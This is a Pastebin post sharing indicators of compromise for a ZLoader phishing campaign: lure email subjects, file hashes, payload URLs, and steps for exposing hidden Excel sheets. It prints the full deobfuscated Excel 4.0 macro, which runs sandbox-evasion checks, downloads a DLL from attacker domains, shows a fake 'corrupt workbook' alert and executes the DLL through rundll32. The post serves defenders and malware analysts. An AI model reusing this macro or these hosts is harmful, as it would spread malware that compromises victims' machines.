API tools faq
paste
ExecuteMalware

2020-03-27 ZLoader IOCs

ExecuteMalware
Mar 27th, 2020
4,586
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.25 KB | None | 0 0
raw download clone embed print report
  1. SENDERS
  2. [email protected]
  3. [email protected]
  4. [email protected]
  5. [email protected]
  6.  
  7. SUBJECTS
  8. Second claim for debt
  9. Undelivered fax documents
  10. Unsent fax receipt's
  11. Your Reminder for Invoice - Honey man
  12.  
  13. ANALYSIS LINKS
  14. https://www.virustotal.com/gui/url/c5bb6572b39cf7700ad78a16f41961428da3ceefd6ae6c4fe57f3119bab6e820/detection
  15. https://www.virustotal.com/gui/url/3224d47bcf9287e8c0e7959a5c5a6c2d9c06762a5df1cf59150af41a505646a7/detection
  16. https://twitter.com/DynamicAnalysis/status/1243613560170823681
  17.  
  18. OVERVIEW
  19. Four Excel spreadhseets - all with a "VeryHidden" worksheet.
  20. LibreOffice can find and reveal these.
  21.  
  22. Open file in LibreOffice
  23. Right click the "Sheet1" tab and select "Show Sheet".
  24. A box pops up with the hidden sheet - select it and press OK
  25.  
  26. The other nice thing about using LibreOffice is that the =char() information is all converted so you can see the commands.
  27. I copied each column of Char codes into Sublime and removed the \n to pull everything up to a single horizontal line.
  28.  
  29. The macros are all the same:
  30.  
  31. =IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)
  32. =IF(GET.WORKSPACE(14)<381, CLOSE(FALSE),)
  33. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  34. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  35. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  36. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cdncloudtech.xyz/bag4hy","c:\Users\Public\cogp5yf.html",0,0)
  37. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://waitupdate.xyz/deg34g","c:\Users\Public\cogp5yf.html",0,0),)
  38. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  39. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\cogp5yf.html,DllRegisterServer",0,5)
  40. =CLOSE(FALSE)
  41.  
  42.  
  43. IOCs
  44. ==========================
  45. https://cdncloudtech.xyz/bag4hy
  46. http://waitupdate.xyz/deg34g
  47.  
  48. report-218.xls
  49. cb6ae0be54a2ef0a07aebebd4c7935f7
  50.  
  51. Case_inf_23577.xls
  52. db3c4de218a06a568ca05bd0f0064416
  53.  
  54. claim.062842.xls
  55. ff555143306c208de55b312e42d82118
  56.  
  57. Incoming.Invoice_48898.xls
  58. 5937e2decff47874577249235f98769f
  59.  
  60.  
  61. First download from: https://cdncloudtech.xyz/bag4hy
  62. calc.dll
  63. 62cb6a2a517351472698f669a845f91c
  64.  
  65. Second download is no longer available: https://waitupdate.xyz/deg34g
  66. Returns 503
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!